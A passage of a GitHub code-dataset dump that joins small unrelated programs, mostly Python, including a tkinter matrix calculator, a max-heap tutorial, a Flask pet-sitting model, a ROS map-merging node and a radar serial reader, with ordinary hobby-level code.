len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if columna == fila:\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.eigenvals()\n t.insert(END, \"Eigen Valores = \\t\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n \n\ndef eigVect(Nombre):\n fila = len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if columna == fila:\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.eigenvects()\n t.insert(END, \"Eigen Valores = \\n\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n nuevoNombre = \"EigVector(\" + Nombre + \")\"\n guardar(m, nuevoNombre)\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n\n\ndef Inversa(Nombre):\n m = Matrix(diccionario[Nombre])\n try:\n res = m.inv()\n except:\n t.insert(END, \"det = 0, la matriz no tiene inversa\\n\")\n c = trans(res)\n t.insert(END, \"\\n\")\n t.insert(END, \"Resultado de la inversa = \\t\")\n t.insert(END, \"\\n\")\n nuevoNombre = Nombre + \"^-1\"\n mostrar(c, nuevoNombre)\n guardar(c, nuevoNombre)\n\n\ndef Suma(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Sumar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n \n res = m + m2\n c = trans(res)\n \n nuevoNombre = Nombre + \" + \" + Nombre2\n \n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef Resta(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n 
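    # Resta builds the same Toplevel + Listbox picker as Suma above and
    # Multiplicacion below; only the button label and the Operacion
    # callback change between the three operations.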
scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Restar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n res = m - m2\n c = trans(res)\n nuevoNombre = Nombre + \" - \" + Nombre2\n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef Multiplicacion(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Multiplicar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n res = m * m2\n c = trans(res)\n \n nuevoNombre = Nombre + \" x \" + Nombre2\n \n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef trans(m):\n row = list()\n col = list()\n contador = 1\n j = 0\n for i in range(0, len(m)):\n \n col.insert(contador, m[i])\n if contador == (len(m.row(0))):\n row.insert(j, col)\n col = list()\n j += 1\n contador = 0 \n contador += 1\n return row\n\n\ndef guardar(matrix, Nombre):\n matrices.append(matrix)\n diccionario[Nombre] = matrices[-1]\n lstMatrices.insert(END, Nombre)\n\n\ndef about():\n fx = Toplevel()\n lb = ttk.Label(fx, text=\"creado por Abdul Hamid Achik Lopez\")\n lb.pack(padx=20, pady=20)\n\ndef MultVar(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n lb = Label(f,text=\"Constante\")\n lb.grid(row=0,column=0)\n ent = ttk.Entry(f,textvariable=5)\n ent.grid(row=1,column=0)\n btn = ttk.Button(f,text=\"Aceptar\", command=lambda: Operacion(m))\n btn.grid(row=2,column=0)\n\n\n def Operacion(Matrix):\n constante = int(Entry.get(ent))\n resultado = Matrix*constante\n res = trans(resultado)\n nuevoNombre = Nombre +\"*\"+ str(constante)\n guardar(res, nuevoNombre)\n f.destroy()\n\ndef guardarFile(texto):\n DAO.agregar(texto)\n\n\n\n\nroot.mainloop() \n","repo_name":"abdul-hamid-achik/Proyecto_Pytrix","sub_path":"Pytrix.py","file_name":"Pytrix.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39921319655","text":"\"\"\"\n - Heaps are type of tree which are always the complete binary tree meaning there should not be any nodes left\n - There are 2 types of Heaps: Maxheap and Minheap\n - Maxheap: a given node is always GREATER than all its descendant nodes\n - Minhead: a given node is always SMALLER than all its descendant nodes\n - Duplicates are allowed in Heap contrary to Binary tree where duplicates are not allowed\n - Heaps are represented mostly as an Array in most algorithms\n - Formula to represent heap in an array is:\n node = i\n left_node = 2 * i\n right_node = (2*i) + 1\n - In binary heap, elements are inserted from left to right\n - Heap is not useful for searching purposes\n - Height of Binary Heap is always Log N (meaning it won't increase un-necessarily\"\n - getMax(): It returns the root element of Max Heap. Time Complexity of this operation is O(1).\n - extractMax(): Removes the maximum element from MaxHeap. 
Time Complexity of this Operation is O(Log n)\n as this operation needs to maintain the heap property (by calling heapify()) after removing root.\n - insert(): Inserting a new key takes O(Log n) time. We add a new key at the end of the tree.\n If new key is smaller than its parent, then we don’t need to do anything. Otherwise,\n we need to traverse up to fix the violated heap property.\n\n\"\"\"\nimport sys\n\n\nclass MaxHeap:\n\n # The constructor initializes the heap with a maxsize entered by the user, size set to 0, all the elements of\n # heap set to 0\n # For the sake of easier calculation of parent and child nodes, we do the indexing from 1 instead\n # of 0. So we fill the 0th index of heap with a garbage value\n def __init__(self, maxsize):\n self.maxsize = maxsize\n self.size = 0\n self.heap = [0] * (self.maxsize + 1)\n self.heap[0] = sys.maxsize\n\n def left_child_pos(self, pos):\n return 2 * pos\n\n def right_child_pos(self, pos):\n return (2 * pos) + 1\n\n def swap(self, fpos, lpos):\n self.heap[fpos], self.heap[lpos] = self.heap[lpos], self.heap[fpos]\n\n # Method to insert a node in the heap. First we increment the size of heap by 1 and insert the element at the end\n # Inserting at the end of the heap will violate the max-heap rule that all max elements should be higher than lower\n # number elements\n # We have to check if the inserted element is greater than its parent(pos: size/2). if inserted element is greater\n # than parent then we swap both of them and keep checking it until we reach at the root node\n def insert(self, element):\n if self.size >= self.maxsize:\n return\n self.size += 1\n self.heap[self.size] = element\n current = self.size\n # check if the element inserted is greater than its parent\n while self.heap[current] > self.heap[current // 2]:\n self.heap[current], self.heap[current // 2] = self.heap[current // 2], self.heap[current]\n current //= 2\n\n def remove_max(self):\n \"\"\"\n In Binary heap, we always delete the root element\n steps to delete and re-arrange/sort binary max heap\n 1. Replace the smallest element with the root element\n 2. compare the child of root node to find the greater element\n 3. swap the greater element with the root node\n 4.\n\n :return:\n \"\"\"\n popped_root_node = self.heap[1]\n self.heap[1] = self.heap[self.size]\n self.heap[self.size] = 0\n self.size -= 1\n self.heapify(1) # First, we always heapify root node whose index = 1\n return popped_root_node\n\n # this method will be called whenever heap property is disturbed and heap needs to be balanced\n # We check if the concerned node is not the leaf node or not the first node. If it is, then no need to do anything\n def heapify(self, position):\n\n # all leaf nodes are at the 2nd half of the array. If the position passed is at the 2nd half of the array,\n # we don't do anything\n if not self.size // 2 < position < self.size:\n\n # check if the node is less than any of the left or right child\n if self.heap[position] < self.heap[self.left_child_pos(position)] or \\\n self.heap[position] < self.heap[self.right_child_pos(position)]:\n\n # check if the left node is greater than right node. 
If so, swap the node with left node\n if self.heap[self.left_child_pos(position)] > self.heap[self.right_child_pos(position)]:\n self.swap(position, self.left_child_pos(position))\n self.heapify(self.left_child_pos(position))\n\n # else if right child is greater than left child then swap node with the right child\n else:\n self.swap(position, self.right_child_pos(position))\n self.heapify(self.right_child_pos(position))\n\n def print_heap(self):\n for i in range(1, (self.size // 2) + 1):\n print(\n f\"Parent: {self.heap[i]} , Left Child is: {self.heap[2 * i]}, Right Child is: {self.heap[(2 * i) + 1]}\")\n\n\nif __name__ == \"__main__\":\n my_heap = MaxHeap(15)\n my_heap.insert(5)\n my_heap.insert(3)\n my_heap.insert(17)\n my_heap.insert(10)\n my_heap.insert(84)\n my_heap.insert(19)\n my_heap.insert(6)\n my_heap.insert(22)\n my_heap.insert(9)\n\n my_heap.print_heap()\n print(my_heap.heap)\n print(\"**************\")\n print(my_heap.remove_max())\n print(my_heap.heap)\n my_heap.print_heap()\n\n print(\"**************\")\n print(my_heap.remove_max())\n print(my_heap.heap)\n my_heap.print_heap()\n\n\"\"\"\n 84\n 22 19 \n \n 17 10 5 6\n \n3 9\n\nAfter 1st heapify:\n\n 22\n 17 19 \n \n 9 10 5 6\n \n3 \n\nAfter 2nd heapify:\n\n 19\n 17 6 \n \n 9 10 5 3\n\n\"\"\"\n","repo_name":"nikhilx5/Data-Structures-And-Algorithms-using-Python","sub_path":"data_structures/trees/binary_max_heap.py","file_name":"binary_max_heap.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17410912686","text":"import json\nimport logging\nimport os\nimport pandas as pd\nimport string\nfrom time import sleep\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom OrganizedBigTable import OrganizedBigTable\nfrom example_config import config\n\nCORE_NLP_PATH = config.get('core_nlp_path')\nSTART_SESSION = config.get('start_session')\nTABLE_PREFIX = config.get('old_table_prefix')\nEND_SESSION = config.get('end_session')\nMEMORY = config.get('java_memory') or '4g'\n\nprops = {'annotators': 'tokenize,ssplit,pos','outputFormat':'json'}\n\ndef parse_pos(client=None):\n local_client = False\n if not client:\n client = StanfordCoreNLP(CORE_NLP_PATH, memory=MEMORY)\n local_client = True\n for i in range(START_SESSION, END_SESSION+1):\n session_number = str(i).zfill(2)\n filename = \"{}_session{}.txt\".format(TABLE_PREFIX, session_number)\n stanford_tag(client, filename)\n sleep(5) # make sure all sessions complete before closing client\n if local_client: # close local client\n client.close()\n\ndef stanford_tag(client, filename):\n\n document = open(filename)\n text = document.read()\n ann = client.annotate(text, properties=props)\n parsed = json.loads(ann)\n words_file_name = '{}_words.txt'.format(os.path.splitext(filename)[0])\n words_file = open(words_file_name, 'w')\n for item in parsed['sentences']:\n for token in item['tokens']:\n word = token['word']\n pos = token['pos']\n words_file.write('{} {}\\n'.format(word, pos))\n\n document.close()\n words_file.close()\n\nif __name__ == '__main__':\n parse_pos()\n","repo_name":"manestay/Text-to-Speech-Prosody-Project","sub_path":"audix/scripts/stanford_pos.py","file_name":"stanford_pos.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21523653685","text":"def solution(arr):\n num = max_ = min(arr)\n arr.remove(max_)\n while True:\n flag = True\n for a in arr:\n if num % a != 0:\n flag 
= False\n break\n if flag:\n return num\n num += max_\n\nif __name__ == \"__main__\":\n print(solution([2, 6, 8, 14]))","repo_name":"837477/Algorithm","sub_path":"Programmers/LEVEL2/N개의 최소공배수.py","file_name":"N개의 최소공배수.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38954772985","text":"import os\nfrom time import strftime\nfrom optparse import OptionParser\nimport setups\n\n\ndef create_log_dir(lab, logs_dir=None, sub_dir=None, mkdir=True):\n # compute directory for all logs based on resultlog arg, lab, and timestamp on local machine\n logs_dir = logs_dir.strip() if logs_dir else os.path.expanduser(\"~\")\n automation_logs = 'AUTOMATION_LOGS'\n if automation_logs in logs_dir:\n logs_dir = logs_dir.split(sep='/{}'.format(automation_logs))[0]\n if sub_dir:\n automation_logs = os.path.join(automation_logs, sub_dir.strip().lower())\n\n lab = lab.lower().replace('-', '_')\n labname = setups.get_lab_dict(lab).get('short_name').replace('-', '_').lower().strip()\n session_dir = os.path.join(logs_dir, automation_logs, labname, strftime('%Y%m%d%H%M'))\n if mkdir:\n os.makedirs(session_dir, exist_ok=True)\n\n return session_dir\n\n\ndef create_test_log_dir(testname, logs_dir=None):\n\n logs_dir = logs_dir if logs_dir else os.path.expanduser(\"~\")\n if '/AUTOMATION_LOGS' in logs_dir:\n logs_dir = logs_dir.split(sep='/AUTOMATION_LOGS')[0]\n if not logs_dir.endswith('/'):\n logs_dir += '/'\n\n session_dir = logs_dir + \"AUTOMATION_LOGS/\" + testname + '/' + strftime('%Y%m%d%H%M')\n os.makedirs(session_dir, exist_ok=True)\n\n return session_dir\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option('-d', '--dir', action='store', type='string', dest='logs_dir',\n help='home directory for automation logs. 
e.g., /sandbox')\n parser.add_option('--subdir', '--sub-dir', '--sub_dir', action='store', type='string', dest='sub_dir',\n help='Sub-folder under AUTOMATION_LOGS dir, such as refstack')\n parser.add_option('--nomkdir', '--no-mkdir', action='store_true', dest='no_mkdir', help=\"Don't mkdir\")\n options, args = parser.parse_args()\n auto_home = options.logs_dir\n sub_dir = options.sub_dir\n no_mkdir = options.no_mkdir\n\n log_dir = create_log_dir(lab=args[0], logs_dir=auto_home, sub_dir=sub_dir, mkdir=(not no_mkdir))\n print(log_dir)\n","repo_name":"pvaduva/auto_test","sub_path":"CGCSAuto/utils/jenkins_utils/create_log_dir.py","file_name":"create_log_dir.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10100025387","text":"import sys\nfrom collections import deque\nfrom datetime import datetime\nfrom heapq import heappop, heappush\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**8)\n\ndef solve(idx, num):\n global st, li\n if num > 0:\n st.add(num)\n for i in range(idx, len(li)):\n solve(i+1, num + li[i])\n\n\n# 23057\nst = set()\nN = int(input())\nli = list(map(int, input().split()))\nli.sort()\n\nsolve(0, 0)\nprint(sum(li) - len(st))\n","repo_name":"kyc113212/BOJ","sub_path":"HashMap/23057_ChallengeNumberKing.py","file_name":"23057_ChallengeNumberKing.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16467438227","text":"\"\"\"\n\n 모든 왼쪽 소괄호는 오른쪽 소괄호와만 짝을 이뤄야 한다.\n 모든 왼쪽 대괄호는 오른쪽 대괄호와만 짝을 이뤄야 한다.\n 모든 오른쪽 괄호들은 자신과 짝을 이룰 수 있는 왼쪽 괄호가 존재한다.\n 모든 괄호들의 짝은 1:1 매칭만 가능하다. 즉, 괄호 하나가 둘 이상의 괄호와 짝지어지지 않는다.\n 짝을 이루는 두 괄호가 있을 때, 그 사이에 있는 문자열도 균형이 잡혀야 한다.\n\n\"\"\"\n\nimport re\nimport sys\n\n\ndef check_bracket(s):\n match = {'(': ')', '[': ']', ')': '(', ']': '['}\n answer = True\n if len(s) == 0:\n return True\n # 여는 괄호를 담는 stack\n open_bracket = []\n for i in s:\n if i == '(' or i == '[':\n open_bracket.append(i)\n else:\n if len(open_bracket) == 0:\n return False\n else:\n if open_bracket[-1] == match[i]:\n open_bracket.pop(-1)\n else:\n return False\n if len(open_bracket) > 0:\n return False\n return answer\n\n\nwhile 1:\n s = input().rstrip()\n\n if s == '.':\n break\n\n s = re.sub('[0-9A-Za-z .]+', '', s)\n\n if check_bracket(s):\n print('yes')\n else:\n print('no')\n","repo_name":"JeongMin-98/StudyForCodingtest","sub_path":"Baekjoon/week2/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"71198907939","text":"import pandas as pd\nfrom rich.console import Console\nimport click\n\n\nDATASET = \"bad_reviews_refined.csv\" # path to the negative dataset csv \nOUTPUT_FOLDER = \"labelled_dataset\"\n\n\nclass Labeller:\n def __init__(self, dataset_path, start, end, copy=True):\n self.start = start\n self.end = end\n self.size = start-end\n self.dataset_path = dataset_path\n self.dataset = pd.read_csv(DATASET)\n self.dataset = self._parse_dataset()\n\n def save(self, output_folder):\n name = f\"{self.start}-{self.end}_reviews.csv\"\n with open(f\"{output_folder}/{name}\", \"w\") as text_file:\n text_file.write(self.dataset.to_csv(index=False))\n\n def write_labels_interactively(self, feature_column_names, label_column_name):\n labels = []\n console = Console()\n for i, row in self.dataset.iterrows():\n console.print(f\"[bold 
green]--------------------------------\")\n for feature_name in feature_column_names:\n feature = row[feature_name]\n console.print(f\"[bold yellow] {feature_name} [bold red]{feature}?\")\n\n console.print(f\"[bold green]--------------------------------\")\n label = console.input(f\"[bold blue] Food safety issue (1) or not (0)?\")\n self.dataset.at[i, label_column_name] = label\n \n\n def _parse_dataset(self):\n df = pd.read_csv(DATASET)\n sliced_df = pd.DataFrame(columns=df.columns)\n for i in range(self.start, self.end):\n sliced_df.loc[i] = df.loc[i]\n return sliced_df\n\n\n\n@click.command()\n@click.option('--start', help='Start row index .', type=int)\n@click.option('--end', help='End row index.', type=int)\ndef main(start, end):\n \"\"\"\n A script that allows interactive labelling of a dataset. It saves a copy of the newly labelled dataset into the labelled_dataset folder \n \"\"\"\n labeller = Labeller(DATASET, start, end)\n labeller.write_labels_interactively([\"review_headline\", \"review_body\", \"sentiment_score\"], \"food_safety_flag\")\n labeller.save(OUTPUT_FOLDER)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yepadee/ads-cwk","sub_path":"labeller.py","file_name":"labeller.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71895656416","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app import DATABASE\nfrom flask import flash\nfrom flask_app.models import address,user,pet,sitter\nclass Service:\n def __init__(self, data):\n self.id = data['id']\n self.pet_id = data['pet_id']\n self.sitter_id = data['sitter_id']\n self.start_date = data['start_date']\n self.end_date = data['end_date']\n self.is_boarding = data['is_boarding']\n self.status = data['status']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n @classmethod\n def create_service(cls,data):\n query = \"\"\"\n INSERT INTO services (pet_id, sitter_id, start_date, end_date, is_boarding)\n VALUES (%(pet_id)s, %(sitter_id)s, %(start_date)s, %(end_date)s, %(is_boarding)s);\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result\n @classmethod\n def retrive_service(cls,data):\n query= \"\"\"SELECT * from users\n JOIN addresses ON users.address_id = addresses.id\n JOIN pets ON users.id = pets.user_id\n JOIN services ON pets.id = services.pet_id\n JOIN sitters ON sitters.id = services.sitter_id\n WHERE services.sitter_id =%(sitter_id)s\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n all_services = []\n if result:\n for row in result:\n this_service = cls(row)\n user_data = {\n **row,\n \"created_at\": row[\"created_at\"],\n \"updated_at\": row[\"updated_at\"],\n \"id\": row[\"id\"]\n }\n pet_data = {\n **row,\n \"created_at\": row[\"pets.created_at\"],\n \"updated_at\": row[\"pets.updated_at\"],\n \"id\": row[\"pets.id\"]\n }\n address_data = {\n **row,\n \"created_at\": row[\"addresses.created_at\"],\n \"updated_at\": row[\"addresses.updated_at\"],\n \"id\": row[\"addresses.id\"]\n }\n sitter_data = {\n **row,\n \"created_at\": row[\"sitters.created_at\"],\n \"updated_at\": row[\"sitters.updated_at\"],\n \"id\": row[\"sitters.id\"]\n }\n service_data = {\n **row,\n \"created_at\": row[\"services.created_at\"],\n \"updated_at\": row[\"services.updated_at\"],\n \"id\": row[\"services.id\"]\n }\n this_service.sitter = sitter.Sitter(sitter_data)\n this_service.user = user.User(user_data)\n 
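                # Each *_data dict above re-spreads the joined row and then
                # overrides id/created_at/updated_at with the table-prefixed
                # columns, because the multi-table JOIN returns duplicate
                # column names keyed by table.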
this_service.address = address.Address(address_data)\n this_service.pet = pet.Pet(pet_data)\n this_service.servicet = Service(service_data)\n all_services.append(this_service)\n # print(all_services,\"%%\"*25)\n return all_services\n else:\n return []\n \n @classmethod\n def retrive_service_in_users(cls,data):\n query= \"\"\"\n select * from services \n join sitters on services.sitter_id = sitters.id\n join users on sitters.user_id= users.id\n join pets on services.pet_id = pets.id\n where pets.user_id = %(id)s ;\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n # print(result,'$$'*33)\n all_services = []\n if result:\n for row in result:\n print(\"*\"*22,row[\"user_id\"],\"*\"*22)\n this_service = cls(row)\n pet_data = {\n **row,\n \"created_at\": row[\"pets.created_at\"],\n \"updated_at\": row[\"pets.updated_at\"],\n \"id\": row[\"pets.id\"]\n }\n\n this_service.sitter = user.User.get_by_id({\n 'id':row['user_id']\n })\n # this_service.user = user.User(user_data)\n # this_service.address = address.Address(address_data)\n this_service.pet = pet.Pet(pet_data)\n # this_service.servicet = Service(service_data)\n all_services.append(this_service)\n # print(all_services,\"%%\"*25)\n print(all_services)\n return all_services\n else:\n return []\n \n \n @classmethod\n def update_accept(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'accepted' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n print(result,'=='*44)\n return result\n \n @classmethod\n def update_decline(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'declined' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result\n \n @classmethod\n def update_completed(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'declined' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result","repo_name":"youssefch2003/Project_Python_2023","sub_path":"flask_app/models/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33094893253","text":"#! 
/usr/bin/env python\n\nimport rospy\nimport sys\nimport tf\nimport cv2\nimport math\nimport time\nimport datetime\nimport numpy as np\nimport os\nimport image_registration\nimport glob\n\nfrom nav_msgs.msg import OccupancyGrid, Odometry, MapMetaData\n\n\nclass MapMerge:\n \"\"\"\n Map Merging ROS\n \"\"\"\n\n def __init__(self):\n \"\"\"\n init class to initialise the class\n\n - rate default 10 (script run rate)\n\n - RANSAC parameters:\n - ransacReprojThreshold default 9 ()\n - confidence default 0.99 ()\n \"\"\"\n rospy.init_node('Map Merging Node')\n\n self.ransacReprojThreshold = rospy.get_param(\"~ransacReprojThreshold\", 9)\n self.confidence = rospy.get_param(\"~confidence\", 0.99)\n\n # Script Run Rate\n self.rate = rospy.Rate(rospy.get_param(\"~rate\", 10))\n\n def StartMapMerging(self):\n\n\n rospy.loginfo(\"start Map Merging Node\")\n\n while not rospy.is_shutdown():\n\n # Get list of ROS topics\n list_of_topics = rospy.get_published_topics()\n rospy.loginfo(\"Got {} number of total topics\".format(len(list_of_topics))) \n\n # Look for topics of type nav_msgs/OccupancyGrid\n list_of_map_topics = [] \n for topic in list_of_topics:\n if topic[1] == 'nav_msgs/OccupancyGrid':\n list_of_map_topics.append(topic)\n \n rospy.loginfo(\"Got {} number of map topics\".format(len(list_of_map_topics)))\n\n # Create inputmaps folder\n try:\n path = os.getcwd() + \"/inputmaps\"\n rospy.loginfo(\"Creating path: {0}\".format(path))\n os.makedirs(path)\n except:\n rospy.logerr(\"Failed to create path: {0}\".format(path))\n\n rospy.loginfo(\"Save all the maps\")\n\n # Save all maps using map_server\n for map_topic in list_of_map_topics:\n os.system(\"rosrun map_server map_saver map:=/{0} -f inputmaps/{1}\".\n format(map_topic[0], map_topic[0][1:].replace('/', '_')))\n\n list_of_maps = glob.glob('inputmaps/*.pgm')\n\n # Attempt a map merge\n if len(list_of_maps) != 0:\n # Run merging algorithm\n image_registration.main(list_of_maps, self.ransacReprojThreshold, self.confidence)\n\n self.rate.sleep()\n\n\nif __name__ == \"__main__\":\n\n try:\n map_merger = MapMerge()\n map_merger.StartMapMerging()\n except rospy.ROSInterruptException:\n pass\n\n\n\n \n\n\n\n\n\n","repo_name":"dikokob/DikokoMScEng","sub_path":"multi_robot_map_merging/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9565705313","text":"from litestar import Controller, get\nfrom litestar.di import Provide\n\nfrom internal.dependencies.menu import get_product, get_category\nfrom schemas.menu import CategorySchema, ProductSchema, CategoryListSchema\nfrom repositories.menu import (\n get_all_categories,\n get_products_by_category_slug,\n\n)\n\n\nclass MenuController(Controller):\n path = \"/menu\"\n\n @get()\n async def get_menu(self) -> list[CategoryListSchema]:\n return [\n CategoryListSchema(**category)\n for category in await get_all_categories()\n ]\n\n @get(\"/{category_slug:str}\", dependencies={\"category\": Provide(get_category)})\n async def get_category(self, category: dict) -> CategorySchema:\n return CategorySchema(\n **category,\n products=await get_products_by_category_slug(category[\"slug\"])\n )\n\n @get(\"/{category_slug:str}/{product_slug:str}\", dependencies={'product': Provide(get_product)})\n async def get_product(self, product: dict) -> ProductSchema:\n return 
ProductSchema(**product)\n","repo_name":"michael7nightingale/litestar-restaurant","sub_path":"src/internal/routes/api/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25993960376","text":"import psycopg2.pool as py\nimport pandas as pd\ndef submit(dsn,sql,File,index=0,position=10000):\n work=pd.read_excel(File,index)\n c=list(work.columns)\n pool=py.ThreadedConnectionPool(1,20,dsn=dsn)\n try:\n conn=pool.getconn()\n with conn.cursor() as cur:\n for i in range(len(work)):\n sorc=work.loc[i]\n data=[]\n for j in range(len(c)):\n if position==j:\n data.append(float(sorc[c[j]]))\n else:\n data.append(str(sorc[c[j]]))\n cur.execute(sql,data)\n conn.commit()\n print('Data submitted successfully')\n except:\n conn.rollback()\n print('Please fix the errors and re-submit')\n raise","repo_name":"jinyuejy/project","sub_path":"database/submitdata.py","file_name":"submitdata.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26690872077","text":"import csv\n\n\ndef write_error_log(row, csv_file='bad_pdb.csv'):\n \"\"\"\n Csv writer function\n :param row:\n :param csv_file:\n :return:\n \"\"\"\n with open(csv_file, \"a\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n if isinstance(row, str):\n row = row.split()\n writer.writerow(row)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vincentx15/binding-project","sub_path":"Conv3D/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"27355759291","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2017-12-21 20:22:27\r\n# @Author : Zhi Liu (zhiliu.mind@gmail.com)\r\n# @Link : http://blog.csdn.net/enjoyyl\r\n# @Version : $1.0$\r\n\r\nimport numpy as np\r\nimport pytool\r\nfrom pytool.radar.protocol import UpDataType\r\n\r\ncom = 'COM7'\r\nbaudrate = 1050000\r\ntimeout = 0.001\r\ntimesleep = 0.0001\r\n\r\n\r\nSOF = b'$$'\r\nEOF = b'####'\r\n# SOF = '$$'\r\n# EOF = '####'\r\nendian = 'Little'\r\ndtype = type(SOF)\r\n\r\n\r\n# plt.ion()\r\n# fig = plt.figure(0)\r\nserial = pytool.serialopen(com=com, baudrate=baudrate, timeout=timeout)\r\n\r\ncnt = 0\r\nFIR_LEN_MTI = 65\r\n\r\nmtd = np.zeros((FIR_LEN_MTI, 256))\r\n\r\nwhile True:\r\n data = pytool.serialread(serial, size=None, timesleep=timesleep)\r\n if dtype is str:\r\n data = data.decode(\"utf-8\")\r\n # print(data)\r\n s, idxHead, idxTail = pytool.findfrm(\r\n data, dtype=dtype, SOF=SOF, EOF=EOF)\r\n\r\n # print(type(data), s, idxHead, idxTail)\r\n data = data[idxHead:idxTail + len(EOF)]\r\n # print(type(data), len(data), idxHead, idxTail)\r\n\r\n Frame = pytool.unpack(\r\n data=data, dtype=dtype, endian='Little', SOF=SOF, EOF=EOF, verbose=True)\r\n\r\n if Frame is None:\r\n continue\r\n\r\n if Frame['DATATYPE'] is UpDataType['UPDT_ORIGECHO']:\r\n IQV, adcmod = pytool.parsing(\r\n Frame=Frame, endian=endian, SOF=None, EOF=None)\r\n if IQV is None:\r\n print(\"IIIIIIIIIIIIIi\")\r\n continue\r\n IQV = np.array(IQV)\r\n x1 = IQV[0] + 1j * IQV[1]\r\n y1 = np.fft.fft(x1)\r\n x2 = IQV[3] + 1j * IQV[4]\r\n y2 = np.fft.fft(x2)\r\n print(cnt)\r\n mtd[cnt, :] = x1\r\n if cnt < FIR_LEN_MTI-1:\r\n cnt = cnt + 